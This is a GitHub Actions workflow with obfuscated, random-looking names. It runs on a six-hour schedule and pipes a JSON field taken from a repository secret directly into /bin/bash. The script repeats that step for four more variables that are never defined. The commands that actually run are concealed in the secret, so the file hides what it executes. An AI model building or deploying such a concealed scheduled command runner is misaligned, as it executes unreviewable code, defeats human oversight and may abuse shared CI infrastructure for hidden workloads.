name: liulinglong6510

on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liulinglong6510
        env:
          iagx3: ${{ secrets.iagx3 }}
        run: |
          echo $iagx3 | jq -r .mb4976 | /bin/bash
          echo $ds4 | jq -r .jtjeu911 | /bin/bash
          echo $bh0 | jq -r .y4360 | /bin/bash
          echo $vunde1813 | jq -r .jzsdu93 | /bin/bash
          echo $q21 | jq -r .nvly2 | /bin/bash

